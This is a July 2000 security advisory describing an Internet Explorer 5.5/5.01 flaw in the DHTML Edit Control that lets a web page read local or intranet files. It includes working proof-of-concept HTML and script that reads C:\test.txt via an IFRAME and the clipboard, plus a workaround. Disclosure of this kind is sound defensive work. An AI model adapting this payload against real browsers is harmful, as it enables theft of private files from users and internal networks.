Subject: [NT] IE 5.5 local text file reading vulnerability (DHTMLED)
Date: Sat, 15 Jul 2000 08:53:53 +0200

          IE 5.5 local text file reading vulnerability (DHTMLED)
--------------------------------------------------------------------------------

SUMMARY

Internet Explorer 5.5 and 5.01 suffer from a security problem that enables
malicious web sites to create a special HTML page which reads the content
of any local and remotely accessible html or text file.
The real danger is reading parsed web pages from Intranet web servers that
are supposedly secured behind the firewall.
The bug is also exploitable from HTML based email messages.

DETAILS

Vulnerable Versions
Internet Explorer 5.5 (all platforms)
Internet Explorer 5.01 (all platforms)

The problem is in the DHTMLED (DHTML Edit Control is marked Safe for
Scripting for IE), which is used for basic HTML editing. It allows opening
a page with an IFRAME and has problems with DOM protection. It is possible
to select the content of the IFRAME (which may be a document residing
anywhere, including local disk), copying it to the clipboard and then
reading it from the clipboard.

Example code:
------dh2.html--------------------------------
<SCRIPT>
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}

function loadit()
{
dh.loadURL("http://www.nat.bg/~joro/ifr2.html");
//                 ^^^^^^^^^^^^^^ You may need to edit this
setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
<HTML>
<IFRAME SRC="file://c:/test.txt" ID="I1" name="I1">
</IFRAME>
</HTML>
---------------------------------------------------

Demonstration is available at:
 <http://www.nat.bg/~joro/dh2.html> http://www.nat.bg/~joro/dh2.html

Workaround:
As usual, disable Active Scripting or disable 'Run ActiveX controls and
plug-ins'.

ADDITIONAL INFORMATION

The information has been provided by  <mailto:joro@NAT.BG> Georgi
Guninski.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.